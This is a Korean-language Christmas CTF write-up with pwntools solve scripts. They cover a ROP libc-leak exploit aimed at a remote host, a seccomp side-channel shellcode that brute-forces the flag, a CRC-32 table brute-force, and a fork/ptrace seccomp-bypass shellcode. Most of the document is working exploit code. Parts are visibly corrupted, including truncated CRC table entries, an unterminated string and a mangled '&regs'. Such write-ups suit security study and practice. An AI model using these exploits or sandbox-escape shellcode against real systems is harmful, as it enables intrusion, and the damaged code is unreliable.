Christmas CTF
1. Solo_test
간단한 ROP이다.
# Christmas CTF - Solo_test: two-stage ROP against a non-PIE binary (the
# gadget address 0x400b83 is absolute). Stage 1 calls puts() on its own GOT
# entry so the service prints a resolved libc pointer; stage 2 returns into
# a libc address computed from that leak. Python 2 / pwntools (str payloads).
from pwn import *
r=remote('115.68.235.72',1337)
e=ELF('./solo_test')
libc=e.libc           # unused below: libc offsets are hard-coded instead
sla=r.sendlineafter
sa=r.sendafter        # unused
pr=0x0000000000400b83 # presumably a `pop rdi; ret` gadget -- confirm in the binary
# Answers to the prompts that precede the vulnerable read; each one is sent
# after the service prints '>>'.
answer=['Me','No','CTF','Never','No']
for i in range(len(answer)):
    sla('>>',answer[i])
# 0x58 bytes of filler reach the saved return address: the read that follows
# '-->' accepts more than its buffer holds, and apparently no stack canary is
# in the way (the chain would otherwise be stopped before the first return).
payload='A'*0x58
payload+=p64(pr)
payload+=p64(e.got['puts'])      # rdi = &GOT[puts] (if pr is pop rdi; ret)
payload+=p64(e.plt['puts'])      # puts(&GOT[puts]) prints the resolved address
payload+=p64(e.symbols['solo'])  # return into solo() for a second overflow
sla('-->',payload)
# Read the leaked pointer up to its 0x7f top byte; '\x20' bytes are stripped
# (presumably a separator echoed by the service -- TODO confirm), then the
# value is padded to 8 bytes. 0x83cc0 is presumably puts' offset in the
# challenge libc, making `leak` the libc base. Both offsets are specific to
# that libc build.
leak=u64(r.recvuntil('\x7f').replace('\x20','').ljust(8,'\x00'))-0x83cc0
log.info(hex(leak))
# Second overflow: return straight to libc base + 0x106ef8 (presumably a
# one-shot gadget in this libc -- not portable to other builds).
payload='A'*0x58
payload+=p64(leak+0x106ef8)
sla('-->',payload)
r.interactive()
2. babyseccomp
mmap이 안걸려 있다.
mmap으로 맵핑하고 Error based shellcoding 하면 될거 같아
# Christmas CTF - babyseccomp: byte-at-a-time recovery of the flag from the
# shellcode's observable behaviour (fault vs. hang), one fresh process per
# guess. Python 2 (print statement).
from pwn import *
import string
context.arch = 'amd64'
#context.log_level="error"
flag = 'XMAS{'
# Positions 0-4 are the known 'XMAS{' prefix; 100 is just an upper bound.
for i in range(5, 100):
    for j in string.printable:
        # shellcraft.mmap(addr, length, prot, flags, fd, offset): maps one
        # page of fd 3 read-only. fd 3 is presumably a file the challenge
        # opened before running the shellcode (TODO confirm). After the
        # syscall rax holds the mapping address, used as the base below.
        shellcode = shellcraft.mmap(0, 0x1000, 1, 1, 3, 0)
        #p = remote("115.68.235.72", 23457)
        p = process('./babyseccomp')
        # Compare byte i of the mapping with the guess j:
        #  - mismatch: jnz returns to `go` with rax = 0xdeadbeef, so the
        #    next load faults (SIGSEGV);
        #  - match: `jmp what` spins forever, so the 2s recv below times out.
        # Only bl is written while the full rbx is compared, so the result
        # also relies on the upper bytes of rbx being zero on entry.
        shellcode += '''\
go:
mov bl, [rax + {}]
what:
mov rcx, {}
cmp rbx,rcx
mov rax,0xdeadbeef
jnz go
jmp what
'''.format(i, ord(j))
        p.sendafter(': ', asm(shellcode))
        try:
            # Acceptance path: "Seg" shows up in the output. NOTE(review):
            # pwntools' recvuntil returns '' on timeout rather than raising,
            # so the except branch is only reached on EOF/other errors --
            # which outcome lands where depends on what the binary prints;
            # confirm before trusting the recovered bytes.
            p.recvuntil("Seg", timeout=2)
            flag += j
            print flag
            p.close()
            break
        except:  # bare except: also swallows KeyboardInterrupt
            p.close()
            continue
참고 : http://ipwn.kr/index.php/2019/07/01/isitdtu-ctf-2019-write-up/
3. Welcome_rev
# Christmas CTF - Welcome_rev: recover flag bytes of a table-driven CRC-32
# style check by brute-forcing one printable byte per slot.
# `dword` has 256 entries and opens 0x0, 0x77073096, 0xEE0E612C, 0x990951BA,
# which matches the standard CRC-32 (IEEE 802.3) lookup table. Several
# entries are shorter than 8 hex digits (e.g. 0x6DE4EB, 0x621F, 0x3895D7,
# 0x9277AF), which looks like copy damage rather than real values -- verify
# against a reference table before relying on any index that hits them.
dword=[0x0,0x77073096,0x0EE0E612C,0x990951BA,0x76DC419,0x706AF48F
,0x0E963A535,0x9E6495A3,0x0EDB8832,0x79DCB8A4,0x0E0D5E91E
,0x97D2D988,0x9B64C2B,0x7EB17CBD,0x0E7B82D07,0x90BF1D91
,0x1DB71064,0x6AB020F2,0x0F3B97148,0x84BE41DE,0x1ADAD47D
,0x6DE4EB,0x0F4D4B551,0x83D385C7,0x136C9856,0x646BA8C0
,0x0FD62F97A,0x8A65C9EC,0x14015C4F,0x63066CD9,0x0FA0F3D63
,0x8D080DF5,0x3B6E20C8,0x4C69105E,0x0D56041E4,0x0A2677172
,0x3C03E4D1,0x4B04D447,0x0D20D85FD,0x0A50AB56B,0x35B5A8FA
,0x42B2986C,0x0DBBBC9D6,0x0ACBCF940,0x32D86CE3,0x45DF5C75
,0x0DCD60DCF,0x0ABD13D59,0x26D930AC,0x51DE003A,0x0C8D75180
,0x0BFD06116,0x21B4F4B5,0x56B3C423,0x0CFBA9599,0x0B8BDA50F
,0x2802B89E,0x5F058808,0x0C60CD9B2,0x0B10BE924,0x2F6F7C87
,0x58684C11,0x0C1611DAB,0x0B6662D3D,0x76DC4190,0x1DB7106
,0x98D220BC,0x0EFD5102A,0x71B18589,0x6B6B51F,0x9FBFE4A5
,0x0E8B8D433,0x7807C9A2,0x0F00F934,0x9609A88E,0x0E10E9818
,0x7F6A0DBB,0x86D3D2D,0x91646C97,0x0E6635C01,0x6B6B51F4
,0x1C6C6162,0x856530D8,0x0F262004E,0x6C0695ED,0x1B01A57B
,0x8208F4C1,0x0F50FC457,0x65B0D9C6,0x12B7E950,0x8BBEB8EA
,0x0FCB9887C,0x621F,0x15DA2D49,0x8CD37CF3,0x0FBD44C65
,0x4DB26158,0x3AB551CE,0x0A3BC0074,0x0D4BB30E2,0x4ADFA541
,0x3895D7,0x0A4D1C46D,0x0D3D6F4FB,0x4369E96A,0x346ED9FC
,0x0AD678846,0x0DA60B8D0,0x44042D73,0x33031DE5,0x0AA0A4C5F
,0x00D7CC9,0x5005713C,0x270241AA,0x0BE0B1010,0x0C90C2086
,0x5768B525,0x206F85B3,0x0B966D409,0x0CE61E49F,0x5EDEF90E
,0x29D9C998,0x0B0D09822,0x0C7D7A8B4,0x59B33D17,0x2EB40D81
,0x0B7BD5C3B,0x0C0BA6CAD,0x0EDB88320,0x9ABFB3B6,0x3B6E20C
,0x74B1D29A,0x0EAD54739,0x9277AF,0x4DB2615,0x73DC1683
,0x0E3630B12,0x94643B84,0x0D6D6A3E,0x7A6A5AA8,0x0E40ECF0B
,0x9309FF9D,0x0A00AE27,0x7D079EB1,0x0F00F9344,0x8708A3D2
,0x1E01F268,0x6906C2FE,0x0F762575D,0x806567CB,0x196C3671
,0x6E6B06E7,0x0FED41B76,0x89D32BE0,0x10DA7A5A,0x674ACC
,0x0F9B9DF6F,0x8EBEEFF9,0x17B7BE43,0x60B08ED5,0x0D6D6A3E8
,0x0A1D1937E,0x38D8C2C4,0x4FDFF252,0x0D1BB67F1,0x0A6BC5767
,0x3FB506,0x48B2364B,0x0D80D2BDA,0x0AF0A1B4C,0x36034AF6
,0x41047A60,0x0DF60EFC3,0x0A867DF55,0x316E8EEF,0x4669BE79
,0x0CB61B38C,0x0BC66831A,0x256FD2A0,0x5268E236,0x0CC0C7795
,0x0BB0B4703,0x220216B9,0x5505262F,0x0C5BA3BBE,0x0B2BD0B28
,0x2BB45A92,0x5CB36A04,0x0C2D7FFA7,0x0B5D0CF31,0x2CD99E8B
,0x5BDEAE1D,0x9B64C2B0,0x0EC63F226,0x756AA39C,0x26D930A
,0x9C0906A9,0x0EB0E363F,0x72076785,0x5005713,0x95BF4A82
,0x0E2B87A14,0x7BB12BAE,0x0CB61B38,0x92D28E9B,0x0E5D5BE0D
,0x7CDCEFB7,0x0BDBDF21,0x86D3D2D4,0x0F1D4E242,0x68B3F8
,0x1FDA836E,0x81BE16CD,0x0F6B9265B,0x6FB077E1,0x18B74777
,0x88085AE6,0x0FF0F6A70,0x66063BCA,0x11010B5C,0x8F659EFF
,0x0F862AE69,0x616BFFD3,0x166CCF45,0x0A00AE278,0x0D702EE
,0x4E048354,0x3903B3C2,0x0A7672661,0x0D06016F7,0x4969474D
,0x3E6E77DB,0x0AED16A4A,0x0D9D65ADC,0x40DF0B66,0x37D83BF0
,0x0A9BCAE53,0x0DEBB9EC5,0x47B2CF7F,0x30B5FFE9,0x0BDBDF21C
,0x0CABAC28A,0x53B39330,0x24B4A3A6,0x0BAD03605,0x0C70693
,0x54DE5729,0x23D967BF,0x0B3667A2E,0x0C4614AB8,0x5D681B02
,0x2A6F2B94,0x0B40BBE37,0x0C30C8EA1,0x5A05DF1B,0x2D02EF8D]
# Presumably the five expected check values; not read by the loops below,
# which compare against hard-coded table entries instead.
enc=[0x376740b3,0x94789c6e,0x66485793,0x56e8bf0e,0xd5f139c0]
flag='XMAS{'   # unused
flag_fake=''   # unused
import string
# Each block asks: which printable byte c makes dword[k ^ ord(c)] equal the
# given table entry? Presumably k is the low byte of the running CRC state
# (slot 0 uses 0xff, consistent with a 0xFFFFFFFF initial state) and the
# right-hand constant is the table entry the check must have selected, i.e.
# one table-driven CRC-32 update step inverted -- TODO confirm against the
# binary. Output: one 'slot : char' line per hit, '---' between blocks.
for i in string.printable:
    if(dword[0xff^ord(i)] == 0xead54739):
        print('0 : '+i)
    if(dword[0xc6^ord(i)] == 0xcb61b38c):
        print('1 : '+i)
    if(dword[0x34^ord(i)] == 0x1ca7eafb):
        print('2 : '+i)
    if(dword[0xfb^ord(i)] == 0x94643b84):
        print('3 : '+i)
print('---')
for i in string.printable:
    if(dword[0xff^ord(i)] == 0x4db2615):
        print('0 : '+i)
    if(dword[0xea^ord(i)] == 0x6906c2fe):
        print('1 : '+i)
    if(dword[0x27^ord(i)] == 0x5edef90e):
        print('2 : '+i)
    if(dword[0xe8^ord(i)] == 0x9309ff9d):
        print('3 : '+i)
print('---')
for i in string.printable:
    if(dword[0xff^ord(i)] == 0x17b7be43):
        print('0 : '+i)
    if(dword[0xbc^ord(i)] == 0xbdbdf21):
        print('1 : '+i)
    if(dword[0x60^ord(i)] == 0x646ba8c0):
        print('2 : '+i)
    if(dword[0x57^ord(i)] == 0xedb8832):
        print('3 : '+i)
print('---')
for i in string.printable:
    if(dword[0xff^ord(i)] == 0xf9b9df6f):
        print('0 : '+i)
    if(dword[0x90^ord(i)] == 0x4e048354):
        print('1 : '+i)
    if(dword[0x74^ord(i)] == 0x83d385c7):
        print('2 : '+i)
    if(dword[0x02 ^ ord(i)] == 0xc0ba6cad):
        print('3 : '+i)
시간안에 못푼거
adult seccomp
https://pwn3r.tistory.com/entry/SECCON-2018-QUAL-Simple-memo?category=801826
여기 있는거 복붙한다. 하지만 조금 바꿔야 한다.
대충 사진에 있는 것처럼 clone을 이용하려 하였지만 seccomp이 걸려 있어서 fork를 사용하였다.
fork 설명 : https://thdev.net/176
그리고 readflag라는 실행파일을 실행시키는 것으로 바꾸었다.
# Christmas CTF - adult seccomp (solved after the event; adapted from the
# SECCON 2018 "Simple memo" write-up linked above, with clone swapped for
# fork). The shellcode forks (syscall 57); the parent busy-waits, then uses
# waitpid/ptrace on the child to fetch its registers and overwrite the slot at
# offset 0x78 of struct user_regs_struct (orig_rax, the pending syscall
# number) before detaching; the child traces itself, stops with tkill, and
# then issues a syscall with '/readflag' on its stack.
# Defensive notes: a seccomp filter that leaves ptrace reachable lets a tracer
# alter a traced sibling's syscall, so deny ptrace unless the workload needs
# it; as far as I recall, kernels since 4.8 also evaluate the filter after the
# ptrace syscall-entry stop, which closes this rewrite path on current kernels.
# NOTE(review): the literal below is closed with `' ''` instead of `'''`,
# which does not parse -- presumably a copy artifact; likewise `®s` in the
# GETREGS/SETREGS comments looks like a mangled `&regs`. Both sit inside the
# string, so they are left byte-for-byte here.
from pwn import *
context.arch='amd64'
r=process('./problem')
shellcode='''
push rbp
mov rbp,rsp
mov rax,57
syscall
test rax,rax
jz child
mov rdx,0x30000000
delay:
dec rdx
test rdx,rdx
jnz delay
push rax
/* waitpid(childpid, NULL, 0) */
mov rdi,rax
mov rsi,0
mov rdx,0
mov r10,0
mov rax,0x3d
syscall
/* ptrace(PTRACE_SYSCALL, childpid, NULL, NULL) */
mov rdi,0x18
mov rsi,[rsp]
mov rdx,0
mov r10,0
mov rax,0x54
syscall
/* waitpid(childpid, NULL, 0) */
mov rdi,[rsp]
mov rsi,0
mov rdx,0
mov r10,0
mov rax,0x3d
syscall
/* ptrace(PTRACE_GETREGS, childpid, NULL, ®s */
mov rdi,0xc
mov rsi, [rsp]
mov rdx,0
mov r10,rsp
add r10,0x400
mov rcx,r10
mov rax,0x65
syscall
/* ptrace(PTRACE_SETREGS, childpid, NULL, ®s) */
mov rdi, 0xd
mov rsi, [rsp]
mov rdx, 0
mov r10, rsp
add r10, 0x400
mov r9, r10
add r9, 0x78
mov qword ptr [r9], 0x0000000000000002
mov rax, 0x65
syscall
/* ptrace(PTRACE_DETACH, childpid, NULL, NULL) */
mov rdi, 0x11
mov rsi, [rsp]
mov rdx, 0
mov r10, 0
mov rax, 101
syscall
mov rax, 0x3c
syscall
child:
/* ptrace(PTRACE_TRACEME, 0, NULL, NULL) */
mov rdi, 0
mov rsi, 0
mov rdx, 0
mov r10, 0
mov rax, 101
syscall
/* syscall(SYS_gettid) */
mov rax, 0x27/*0xba*/
syscall
/* syscall(SYS_tkill, pid, SIGSTOP) */
mov rdi, rax
mov rsi, 0x13
mov rax, 0x3e/*0xc8*/
syscall
''' + shellcraft.pushstr('/readflag') + '''
mov rdi,rsp
xor edx,edx
xor esi,esi
xor rax,rax
push rdi
push rdi
mov rsi,rdi
mov rax,39
syscall' ''
r.sendline(asm(shellcode))  # assemble for amd64 and hand it to the target
r.interactive()
auto injection
바이너리 안에 변수와 ret의 거리를 나타낸 데이터가 있다. 그걸 이용하여 ret을 적절하게 덮는다.
bash jail: $0, head,tail
deadfile이랑 meet은 롸업보고 공부해야겠다.